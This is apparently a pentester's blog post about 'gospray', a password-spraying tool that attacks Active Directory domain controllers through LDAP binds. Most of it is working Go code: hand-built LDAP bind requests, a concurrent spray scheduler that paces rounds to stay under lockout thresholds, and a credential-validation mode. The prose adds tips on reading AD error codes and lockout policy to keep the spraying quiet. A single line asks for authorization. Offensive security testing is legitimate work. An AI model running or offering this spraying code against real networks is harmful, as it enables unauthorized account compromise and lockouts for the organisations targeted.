On a network and need credentials? Try password spraying the domain controller directly.
A few years ago I wrote a password spray tool called gospray, and it has been used successfully in a couple of engagements since. It validates credentials with an LDAP bind directly against the domain controller, so it doesn't need an SMB server (or any other service) as the target. That keeps it fairly quiet, and the number of concurrent Go routines is configurable. :)
Check it out on GitHub: GoSpray
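To show what that LDAP bind check looks like on the wire, here is an added example (my own illustration, not gospray's code): it builds an LDAPv3 simple BindRequest by hand, parses the result code out of the BindResponse, and performs one bind over TCP with nothing but the Go standard library. The DC address `dc01.corp.local:389` and the `CORP\alice` / `Winter2024!` credentials are placeholders.

```go
package main

import (
	"errors"
	"fmt"
	"net"
	"time"
)

// berLen encodes a BER definite length in minimal form (a bind never approaches 64 KiB).
func berLen(n int) []byte {
	if n < 0x80 {
		return []byte{byte(n)}
	}
	if n < 0x100 {
		return []byte{0x81, byte(n)}
	}
	return []byte{0x82, byte(n >> 8), byte(n)}
}

// tlv wraps a value in one BER tag-length-value element.
func tlv(tag byte, v []byte) []byte {
	return append(append([]byte{tag}, berLen(len(v))...), v...)
}

// buildBindRequest encodes an LDAPv3 simple BindRequest: LDAPMessage{ id, [APPLICATION 0]{ 3, name, [0] pw } }.
func buildBindRequest(msgID byte, name, password string) []byte {
	bind := append(tlv(0x02, []byte{3}), tlv(0x04, []byte(name))...)
	bind = append(bind, tlv(0x80, []byte(password))...)
	return tlv(0x30, append(tlv(0x02, []byte{msgID}), tlv(0x60, bind)...))
}

// readTLV splits one BER element off b; long-form lengths occur once a DC's diagnostic message grows.
func readTLV(b []byte) (tag byte, val, rest []byte, err error) {
	if len(b) < 2 {
		return 0, nil, nil, errors.New("short BER element")
	}
	n, i := int(b[1]), 2
	if k := n & 0x7f; n&0x80 != 0 { // long form: k length octets follow
		if k == 0 || k > 4 || len(b) < 2+k {
			return 0, nil, nil, errors.New("bad BER length")
		}
		for n = 0; i < 2+k; i++ {
			n = n<<8 | int(b[i])
		}
	}
	if len(b) < i+n {
		return 0, nil, nil, errors.New("truncated BER element")
	}
	return b[0], b[i : i+n], b[i+n:], nil
}

// parseBindResultCode walks LDAPMessage{ id, [APPLICATION 1] BindResponse } and returns resultCode (0 ok, 49 invalidCredentials).
func parseBindResultCode(resp []byte) (int, error) {
	tag, msg, _, err := readTLV(resp)
	if err != nil || tag != 0x30 {
		return -1, errors.New("not an LDAPMessage")
	}
	if _, _, msg, err = readTLV(msg); err != nil { // skip messageID
		return -1, err
	}
	tag, body, _, err := readTLV(msg)
	if err != nil || tag != 0x61 {
		return -1, errors.New("not a BindResponse")
	}
	tag, code, _, err := readTLV(body)
	if err != nil || tag != 0x0a || len(code) != 1 {
		return -1, errors.New("malformed resultCode")
	}
	return int(code[0]), nil
}

// ldapBind does one simple bind against a DC ("dc01.corp.local:389"); AD takes "DOMAIN\user" or a UPN as name.
func ldapBind(addr, name, password string, timeout time.Duration) (bool, error) {
	if password == "" { // a DC may treat this as an unauthenticated (anonymous) bind and answer success
		return false, errors.New("empty password would be an unauthenticated bind, not a check")
	}
	conn, err := net.DialTimeout("tcp", addr, timeout)
	if err != nil {
		return false, err
	}
	defer conn.Close()
	_ = conn.SetDeadline(time.Now().Add(timeout))
	if _, err := conn.Write(buildBindRequest(1, name, password)); err != nil {
		return false, err
	}
	buf := make([]byte, 4096)
	n, err := conn.Read(buf)
	if err != nil {
		return false, err
	}
	code, err := parseBindResultCode(buf[:n])
	return code == 0, err
}

func main() { // hypothetical DC, constructed credentials: prints a dial error unless such a host exists
	fmt.Println(ldapBind("dc01.corp.local:389", `CORP\alice`, "Winter2024!", 5*time.Second))
}
```

Two caveats are baked in. An empty password is refused client-side: a bind with a name but no password is an unauthenticated bind, which a DC may answer with success (bound as anonymous), and a spray tool that counts that as a hit produces false positives. The BER reader handles long-form lengths because the diagnostic string a DC attaches to a failed bind can push the response past 127 bytes. Against Active Directory that diagnostic string also carries a `data` code worth logging: `52e` is a wrong password, `533` a disabled account, `532` an expired password and `775` a locked-out account, so a run of `775` responses is your signal to stop immediately. A single `Read` is enough for a BindResponse in practice; a production client would frame on the BER length. Plain LDAP on 389 sends the password in the clear; over LDAPS (636) you would wrap the connection with `crypto/tls`.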
High Level Features
At a high level, the latest version supports two modes:
- Password Spray: if both the user list and the `-passwords` command line arguments are specified, a spray is performed: each password is tried against every user in turn.
- Password Validation: the `-validatecreds` command line option selects validation. The file given to `-validatecreds` is parsed line by line; each line is split on a colon (`:`) into username:password, and an authentication attempt is made for that pair against the specified domain controller.
By default it waits 10 seconds after each round (one horizontal round being one password tried against every user). You will probably want to adjust that depending on the number of accounts, the number of passwords and the lockout policy (threshold and observation window) of the target domain.
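As an added example (my own illustration, not gospray's code) of the two modes and the round pacing just described: a horizontal spray that caps the number of concurrent binds and pauses between password rounds, and a validation mode that parses username:password lines. It is transport-agnostic, taking the bind as a function, so the demo runs offline with a stand-in instead of a real DC; all user names and passwords are constructed.

```go
package main

import (
	"fmt"
	"strings"
	"sync"
	"time"
)

// bindFunc performs one LDAP simple bind against the DC and reports whether it was
// accepted; the scheduling below does not care how the bind is transported.
type bindFunc func(user, password string) (bool, error)

// parseCredLine splits one "username:password" line. SplitN keeps colons that belong
// to the password; an empty password is rejected because binding with it would be an
// unauthenticated bind, not a credential check.
func parseCredLine(line string) (user, pass string, ok bool) {
	parts := strings.SplitN(strings.TrimRight(line, "\r\n"), ":", 2)
	if len(parts) != 2 || parts[0] == "" || parts[1] == "" {
		return "", "", false
	}
	return parts[0], parts[1], true
}

// validateCreds is the validation mode: each well-formed line is tried exactly once.
// It returns the pairs that bound and the number of lines it had to skip.
func validateCreds(content string, bind bindFunc) (valid []string, malformed int) {
	for _, line := range strings.Split(content, "\n") {
		if strings.TrimSpace(line) == "" {
			continue
		}
		u, p, ok := parseCredLine(line)
		if !ok {
			malformed++
			continue
		}
		if accepted, err := bind(u, p); err == nil && accepted {
			valid = append(valid, u+":"+p)
		}
	}
	return valid, malformed
}

// spray is the spray mode: horizontal rounds, i.e. one password against every user
// with at most `workers` binds in flight, then `pause` before the next password,
// so each account takes at most one failed attempt per round.
func spray(users, passwords []string, bind bindFunc, workers int, pause time.Duration) []string {
	if workers < 1 {
		workers = 1
	}
	var mu sync.Mutex
	var hits []string
	for i, pw := range passwords {
		if i > 0 {
			time.Sleep(pause)
		}
		sem := make(chan struct{}, workers)
		var wg sync.WaitGroup
		for _, u := range users {
			wg.Add(1)
			sem <- struct{}{}
			go func(u, pw string) {
				defer wg.Done()
				defer func() { <-sem }()
				if accepted, err := bind(u, pw); err == nil && accepted {
					mu.Lock()
					hits = append(hits, u+":"+pw)
					mu.Unlock()
				}
			}(u, pw)
		}
		wg.Wait()
	}
	return hits
}

func main() {
	// Constructed demo data and a stand-in for the real bind; wire in an LDAP bind
	// function to run this against a domain controller.
	fake := func(u, p string) (bool, error) { return u == "alice" && p == "Winter2024!", nil }
	users := []string{"alice", "bob", "carol"}
	hits := spray(users, []string{"Summer2024!", "Winter2024!"}, fake, 2, time.Second)
	fmt.Println("spray hits:", hits)
	valid, bad := validateCreds("alice:Winter2024!\nbob:Pa:ss\nbadline\n", fake)
	fmt.Println("validated:", valid, "malformed lines:", bad)
}
```

On pacing: in Active Directory the lockout threshold counts bad passwords per account within the lockout observation window, so the interval that matters is the gap between rounds measured against that window, not the delay between individual binds. A 10-second default is a breathing pause, not a lockout-safe interval; with a threshold of N you want no more than N-1 passwords per account inside one window, and you should read the actual values (`net accounts /domain`, or `Get-ADDefaultDomainPasswordPolicy`) before starting, remembering that fine-grained password policies can give some groups a stricter threshold than the domain default.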
Note: Be careful with account lockout policies (know what you are doing!) and make sure you have authorization from the appropriate stakeholders before engaging in this kind of testing.